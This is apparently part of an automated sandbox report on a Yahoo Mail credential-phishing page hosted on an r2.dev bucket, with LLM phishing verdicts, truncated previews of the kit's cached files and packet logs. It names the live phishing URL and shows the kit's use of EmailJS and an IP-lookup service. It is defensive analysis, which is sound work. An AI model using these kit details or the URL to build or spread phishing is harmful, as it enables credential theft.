                      • Excluded IPs from analysis (whitelisted): 142.250.185.78, 142.250.110.84, 142.250.185.67, 172.64.147.188, 104.18.40.68, 142.250.185.138, 104.18.187.31, 104.18.186.31, 142.250.186.74, 142.250.181.234, 142.250.185.202, 142.250.185.74, 216.58.206.74, 142.250.185.234, 172.217.18.106, 142.250.184.234, 172.217.23.106, 142.250.185.170, 216.58.206.42, 142.250.186.42, 216.58.212.138, 142.250.185.106, 142.250.186.170, 40.68.123.157, 93.184.221.240, 20.242.39.171, 192.229.221.95, 13.85.23.206, 216.58.206.67
                      • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, pro.fontawesome.com.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl

                      Simulations

                      Behavior and APIs

                      No simulations

                      LLM Input / Output

                      InputOutput
                      URL: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Model: Perplexity: mixtral-8x7b-instruct
                      {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests for a sensitive information i.e. password.","The text does not create a sense of urgency.","There is no CAPTCHA or any anti-robot detection mechanism present on the webpage."]}
                      Title: Yahoo Mail | Sign in OCR: yahoo! yahoo! Yahoo makes it easy to enjoy what matters most in Enter password your world. using your Yahoo account Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of Password life. Next Forgot password?
                      URL: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev Model: gpt-4o
                      ```json{  "phishing_score": 9,  "brands": "Yahoo",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "yahoo.com",  "reasons": "The URL 'https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev' does not match the legitimate domain 'yahoo.com'. The page prominently displays a login form asking for a password, which is a common phishing tactic. The domain 'r2.dev' is suspicious and not associated with Yahoo. The use of a subdomain and a long, complex URL is another common social engineering technique to mislead users. There is no CAPTCHA present, which is often used by legitimate sites to prevent automated attacks. Overall, the combination of these factors strongly suggests that this is a phishing site."}

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      Chrome Cache Entry: 49

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1218
                      Entropy (8bit):5.026509521547098
                      Encrypted:false
                      SSDEEP:24:VUAotOyJFPz0tv4IrexQCyJIQwXXxsqO1e5q811A3hLB6XOIL7/:iAQJ5z0tAce8IQQBskFINA
                      MD5:726EF0647391ED5EFC9076BCDB91C606
                      SHA1:5BDEE0E3E5C9B14CE2F6D9CB34A1EB056B0B51EE
                      SHA-256:0F549EC9F7ABAAF6409BF193A6156746C92DF5FF979C66A378F2E73E616C8533
                      SHA-512:91A23DEE6751E1043FAD976F74EC1CCFE71E643B3F8B53C51439CCE42F701731EBDE99D0BBF3E938E9A2CF8E44D19ADB8A396BBDAA0845E639228C41D761B5A3
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css
                      Preview:input {.. -webkit-appearance: none;.. -moz-appearance: none;.. appearance: none;.. border-radius: 0;.. }.....input-field {.. position: relative;...text-align: left;...margin-top: 9ex;.. }.....input-field label {.. position: absolute;.. top: 0;.. left: 0;.. width: 100%;.. color: #717171;.. transition: 0.2s all;.. cursor: text;.. }......input[type="text"], input[type="password"]{...border: none;...border-bottom: 1px solid gray;...width: 100%;...padding-top: .4em;...padding-bottom: .4em;...font-size: 105%;.....}....input[type="text"]:hover, input[type="password"]:hover{../*..*/....}.....input-field input:focus, .input-field input:valid {.. border-color: rgb(11,110,253);.. border-bottom: 1px solid rgb(11,110,253);.. }.....input-field input:focus~label, .input-field input:valid~label {.. top: -25px;.. color: black;...font-size: 80%;.. }.........input[type=submit], button{.. width: 100%;.. margin-top: 2ex;.. padding: 2ex;.. border-radi

                      Chrome Cache Entry: 50

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1444
                      Entropy (8bit):4.59048261752926
                      Encrypted:false
                      SSDEEP:24:AB1CrJzswvtlyWkV9FY51CyoP/WB1s6KTdW1APvbTJt8CPF:AB1CrJgw14fU05/YmbTECPjTX8g
                      MD5:52ECF9BBF69E5BB6EA38C281C8DE64DF
                      SHA1:24408727238F2D74888BC2B4DCDB4409BA7B508B
                      SHA-256:B76CCCD789FBC73288F948C24B4E2C311B8AA7FEDFB026E20B76509F99193F4B
                      SHA-512:29A46EB12B7CE9D95C9E92D8407E2CC1AF177927C77A26511B01AACDEADFAD276BD9B442761CFFA41125733E4EECDDCFCC227C6AE272CC2E2F0B6752D88E6221
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css
                      Preview:* { .. -moz-box-sizing: border-box; .. -webkit-box-sizing: border-box; .. box-sizing: border-box; ..}....html , body{.. font-family: "Trebuchet MS", "Helvetica Neue", Helvetica, Arial, sans-serif;.. height: 100%;.. width: 100%;..}....body{.. margin: 0;.. padding: 0;.. background-color: #F4F4F4;..}..#header{.. padding: 2ex;.. width: 100%;.. height: auto;.. background-color: white;..}..#header img{.. height: 4ex;.. margin-left: 2ex;.. ..}..#main{.. width: 1000px;.. margin: 0 auto;.. position: static;.. ..}..#log{.. width: 400px;.. height: auto;.. margin-top: 2ex;.. padding: 3.5ex;.. background-color: white;.. text-align: center;.. float: right;....}..#log img{.. height: 3ex;.. ..}..#minfo{.. width:550px;.. height: 50px;.. display: inline-flex;.. padding-top: 7ex;....}....#minfo p{.. font-size: 140%;.... ..}....#checkk{.. margin-top:2.5ex;..}....#btnn{.. margin-top: 10ex;..}....@

                      Chrome Cache Entry: 51

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 2160 x 599, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):57304
                      Entropy (8bit):7.8007384651994025
                      Encrypted:false
                      SSDEEP:1536:3hYSWoE7G/PWZHM2Gcn4iHFNcEFIZ57Inyeaa4M:RYhoE6/vRH2ny7M
                      MD5:8F78102F8FE4467EA5AF76657DD90891
                      SHA1:2CCA9300ABC18E5D22172A146EEBB32B44764489
                      SHA-256:DD5A09D5898D5480D063E1833C4D9BC3F509F3D7C672E0C0E973BB061A694AE2
                      SHA-512:82F21501C5209C4840288C9C5268C4A860F118B9D797019E2328E9D8C5A57B4FA780E7802EFBF12C28EF80F0DB3145EBF57A17190A3BE191AAF488BAC5C9B89B
                      Malicious:false
                      Reputation:low
                      Preview:.PNG........IHDR...p...W.......1.....sBIT....|.d.....pHYs..........=......tEXtSoftware.www.inkscape.org..<... .IDATx...{.\......;.......@.!....e4..: *6...*.h4L.9.<3g.1g.3.3.....:. &(. .A.p.....rS....H.{?......Iu=.....X+.tW}Y+.S]...6....hxy..bf7Fw.................`.......................M.........-f............@.%..D7 3....8...............v....;....K4{=.............*.5.).9........................M2;/...q.r.|\b............@.L...$...l0..7~.............J1]....x.U=v...a............@....PIs.;...KW..7~..............H....,.....Y.o................Q....[{t.2.|.....?.............m4I..H.1......~.).............z.f_.n@6...\G...s..............AQ...4#...`.\...3............`[$. :...rN..?`.............V*j`ww}:...a..J..................[m.<I.+.../y.?j.f.............b.V7.Ygt....;.k....9W............`+.?)i...d.k.;.1................-.n@V.&h.{....8...............H.ht..../[....9.8.............4..I..L....w.$..............B..[.....d.....}..............F.u5.K.9..../...1.......

                      Chrome Cache Entry: 52

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65393)
                      Category:downloaded
                      Size (bytes):156228
                      Entropy (8bit):4.7111706245877825
                      Encrypted:false
                      SSDEEP:1536:KgvcfQ4aNi7HHQZD0bMSPCDTdV3dWGFIiboA+8Ieiy6BauXZG817fgFSkAmYdAT/:DcI4aY7QN0bjPerGuHuXkz
                      MD5:AA1272633E7E552395D147A499BAD186
                      SHA1:DDBCCB0011DD4868A013B1DCBDB836B7213EB41D
                      SHA-256:2AF905D92CFD34B5413126A54F639DA408166CBBCB54318E413AD5E10B5BF6EC
                      SHA-512:886DDFC7252269B42B0ADFD5F4E47DA0CD6CCB9B0B3EA18C015B1E4EDB1EB1F55CF49728FDCDD151949256851C72CC555CD7F6408A5638595F26D0CAF86FFBDC
                      Malicious:false
                      Reputation:low
                      URL:https://pro.fontawesome.com/releases/v5.10.0/css/all.css
                      Preview:/*!. * Font Awesome Pro 5.10.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license (Commercial License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:rig

                      Chrome Cache Entry: 53

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):274
                      Entropy (8bit):4.897270223761388
                      Encrypted:false
                      SSDEEP:6:kXO19TgIJAuuuthkP//f4IoWzqs4jW1CAn:k+15gIOuHhA/XvoPPWf
                      MD5:D362ABFA435FB75BBDCB2E194D14DC4F
                      SHA1:E5DEC1FABE990767DB2966E945BF08A269130933
                      SHA-256:EE7C9F0B3E011AC99A18CC6EC81AC78F25DC57CFE01CB69B99B7A45E5D8927D0
                      SHA-512:88796C53A918EEE6AD6AC2BB24613EA1DC283601261A9D5712473F355FF3FDF3A2F2895273A5C41D10F57C69768729ED4E3672DAF4730DF15BF101F894C4A2EC
                      Malicious:false
                      Reputation:low
                      Preview:{. "ip": "8.46.123.33",. "hostname": "static-cpe-8-46-123-33.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York".}

                      Chrome Cache Entry: 54

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32058)
                      Category:downloaded
                      Size (bytes):86659
                      Entropy (8bit):5.36781915816204
                      Encrypted:false
                      SSDEEP:1536:YNhEyjjTikEJO4edXXe9J578go6MWX2xkj8e4c4j2ll2AckaXEP6n15HZ+FhFcQ7:uxc2yjx4j2uX/kcQDU8Cu9
                      MD5:C9F5AEECA3AD37BF2AA006139B935F0A
                      SHA1:1055018C28AB41087EF9CCEFE411606893DABEA2
                      SHA-256:87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
                      SHA-512:DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
                      Malicious:false
                      Reputation:low
                      URL:https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
                      Preview:/*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var

                      Chrome Cache Entry: 55

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (611)
                      Category:downloaded
                      Size (bytes):27150
                      Entropy (8bit):4.357340680151037
                      Encrypted:false
                      SSDEEP:384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
                      MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                      SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                      SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                      SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.ico
                      Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

                      Chrome Cache Entry: 56

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):5385
                      Entropy (8bit):4.553378790997423
                      Encrypted:false
                      SSDEEP:48:IkQEYafYi808F0Cri1BHKhEbc10odMNiHIGaBzxBlnUsPwEKSKWJMpKyeJTB5J:jYSYi8RF0h7bcW5NzBf2sPwr80qX
                      MD5:167C14212AB66C838DA881E5FAF380E1
                      SHA1:D8ACB8C82BC33E0CE92714AD520AEB633E258AF4
                      SHA-256:93D44944EB748CC718B13265D2BAB5A839A966D91FE91BC6439ABF2A65A983D3
                      SHA-512:A43BC4A54C8BABAC9BC3B0C1CC12E2904BEB6AA397E888EEEC97018F24225D18B52D60EA78E91D0FDDE5D6C80BD95598562ED391CF6182E7A55669025B459A23
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Preview:..<!doctype html>..<html lang="en">.. <head>.. Required meta tags -->.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <meta name="description" content="">.. <meta name="author" content="f3lakutie">...... font awesome-->.. <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous" >.. .. .. favicon-->.. <link rel="shortcut icon" href="images/download_afD_icon.ico" type="image/png">.. for apple mobile devices -->.. <link rel="apple-touch-icon-precomposed" href="images/download_afD_icon.ico" type="image/png" sizes="152x152">.. <link rel="apple-touch-icon-precomposed" href="images/download_afD_icon.ico" type="image/png" sizes="120x120">.... default style-->.. <style>.. /*.. */.. .. </style>.... <tit

                      Chrome Cache Entry: 57

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (2058), with no line terminators
                      Category:downloaded
                      Size (bytes):2058
                      Entropy (8bit):5.2275519102374925
                      Encrypted:false
                      SSDEEP:48:I54twbMVLUwxlRiCXloJpA+D+F0N+4+DSnm7DGl46YXkgs2:I5nb+YaHP1oJC+iF0J+enm7I43X42
                      MD5:AAF4B4C066039688024B3EB28B99260D
                      SHA1:3D7499D713898A2798F449D8B3528D4094475208
                      SHA-256:249F5139F01396E20B067FBE6DB17315981FB1C36C64D64DF224BCF0F8750EAB
                      SHA-512:9BF344AC90C909CB03955757565B9E442BDC411BDF90303C894FB571005F9C1ED211852BCA4503BE8B59C1F2980B2D94B6E511690DB475A51AD7672FB05E22DC
                      Malicious:false
                      Reputation:low
                      URL:https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js
                      Preview:(()=>{"use strict";var e={d:(t,r)=>{for(var i in r)e.o(r,i)&&!e.o(t,i)&&Object.defineProperty(t,i,{enumerable:!0,get:r[i]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t),e.d(t,{default:()=>l,init:()=>i,send:()=>a,sendForm:()=>d});const r={_origin:"https://api.emailjs.com"},i=function(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"https://api.emailjs.com";r._userID=e,r._origin=t},s=(e,t,r)=>{if(!e)throw"The public key is required. Visit https://dashboard.emailjs.com/admin/account";if(!t)throw"The service ID is required. Visit https://dashboard.emailjs.com/admin";if(!r)throw"The template ID is required. Visit https://dashboard.emailjs.com/admin/templates";return!0};class o{constructor(e){this.status=e?e.status:0,this.text=e?e.responseText:"Network Error"}}const n=function(e,t){let i=argume

                      Chrome Cache Entry: 58

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:Hm0n:pn
                      MD5:7BB7122B943F1A90979012260A7198F0
                      SHA1:89E353A31F28A60AC1F8E9A642501D612CDE4111
                      SHA-256:917D709AA3A7011EBB1D9FD1196D1D37E711F03BFC83E5355E900BF092DE34A0
                      SHA-512:422BC6046C768645428157EF0426BE77DE18F5217C8ECE5E16D6EC8F117985A34F155DD36D486DB74E012603FE285F6B9AC196A4CD2019F39322A410A1CA1E4B
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlzS0pQeUuHlRIFDV07bhY=?alt=proto
                      Preview:CgkKBw1dO24WGgA=

                      Chrome Cache Entry: 59

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 2160 x 599, 8-bit/color RGBA, non-interlaced
                      Category:downloaded
                      Size (bytes):57304
                      Entropy (8bit):7.8007384651994025
                      Encrypted:false
                      SSDEEP:1536:3hYSWoE7G/PWZHM2Gcn4iHFNcEFIZ57Inyeaa4M:RYhoE6/vRH2ny7M
                      MD5:8F78102F8FE4467EA5AF76657DD90891
                      SHA1:2CCA9300ABC18E5D22172A146EEBB32B44764489
                      SHA-256:DD5A09D5898D5480D063E1833C4D9BC3F509F3D7C672E0C0E973BB061A694AE2
                      SHA-512:82F21501C5209C4840288C9C5268C4A860F118B9D797019E2328E9D8C5A57B4FA780E7802EFBF12C28EF80F0DB3145EBF57A17190A3BE191AAF488BAC5C9B89B
                      Malicious:false
                      Reputation:low
                      URL:https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png
                      Preview:.PNG........IHDR...p...W.......1.....sBIT....|.d.....pHYs..........=......tEXtSoftware.www.inkscape.org..<... .IDATx...{.\......;.......@.!....e4..: *6...*.h4L.9.<3g.1g.3.3.....:. &(. .A.p.....rS....H.{?......Iu=.....X+.tW}Y+.S]...6....hxy..bf7Fw.................`.......................M.........-f............@.%..D7 3....8...............v....;....K4{=.............*.5.).9........................M2;/...q.r.|\b............@.L...$...l0..7~.............J1]....x.U=v...a............@....PIs.;...KW..7~..............H....,.....Y.o................Q....[{t.2.|.....?.............m4I..H.1......~.).............z.f_.n@6...\G...s..............AQ...4#...`.\...3............`[$. :...rN..?`.............V*j`ww}:...a..J..................[m.<I.+.../y.?j.f.............b.V7.Ygt....;.k....9W............`+.?)i...d.k.;.1................-.n@V.&h.{....8...............H.ht..../[....9.8.............4..I..L....w.$..............B..[.....d.....}..............F.u5.K.9..../...1.......

                      Chrome Cache Entry: 60

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:downloaded
                      Size (bytes):274
                      Entropy (8bit):4.897270223761388
                      Encrypted:false
                      SSDEEP:6:kXO19TgIJAuuuthkP//f4IoWzqs4jW1CAn:k+15gIOuHhA/XvoPPWf
                      MD5:D362ABFA435FB75BBDCB2E194D14DC4F
                      SHA1:E5DEC1FABE990767DB2966E945BF08A269130933
                      SHA-256:EE7C9F0B3E011AC99A18CC6EC81AC78F25DC57CFE01CB69B99B7A45E5D8927D0
                      SHA-512:88796C53A918EEE6AD6AC2BB24613EA1DC283601261A9D5712473F355FF3FDF3A2F2895273A5C41D10F57C69768729ED4E3672DAF4730DF15BF101F894C4A2EC
                      Malicious:false
                      Reputation:low
                      URL:https://ipinfo.io/json?token=5eaf0700b2c0d2
                      Preview:{. "ip": "8.46.123.33",. "hostname": "static-cpe-8-46-123-33.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York".}

                      Static File Info

                      No static file info

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 5, 2024 00:30:13.047107935 CEST49675443192.168.2.4173.222.162.32
                      Jul 5, 2024 00:30:22.655050039 CEST49675443192.168.2.4173.222.162.32
                      Jul 5, 2024 00:30:23.671369076 CEST4973580192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:23.671742916 CEST4973680192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:23.678673029 CEST8049735104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:23.678683043 CEST8049736104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:23.679924965 CEST4973580192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:23.679924965 CEST4973680192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:23.681943893 CEST4973680192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:23.688882113 CEST8049736104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:24.172616005 CEST8049736104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:24.198139906 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:24.198193073 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:24.198295116 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:24.198524952 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:24.198540926 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:24.220005035 CEST4973680192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.323923111 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.376708984 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.440854073 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.440869093 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.441941977 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.441956997 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.442007065 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.527570963 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.527695894 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.528229952 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.528253078 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.576505899 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.745513916 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745580912 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745610952 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745630026 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.745640039 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745651960 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745681047 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.745731115 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.745778084 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.748872995 CEST49737443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.748892069 CEST44349737104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.843178034 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.843205929 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.843281984 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.844959021 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.844973087 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.846067905 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.846107960 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:25.846175909 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.846791029 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:25.846807003 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.445483923 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.445712090 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.487499952 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.488593102 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.523261070 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.523276091 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.523462057 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.523471117 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.523643970 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.523818970 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.532388926 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.532461882 CEST44349741104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.535661936 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.535722971 CEST44349740104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:26.538063049 CEST49741443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.538480997 CEST49740443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:26.567681074 CEST49745443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:30:26.567725897 CEST44349745142.250.185.68192.168.2.4
                      Jul 5, 2024 00:30:26.567799091 CEST49745443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:30:26.568253040 CEST49745443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:30:26.568269014 CEST44349745142.250.185.68192.168.2.4
                      Jul 5, 2024 00:30:26.580502033 CEST44349740104.18.2.35192.168.2.4
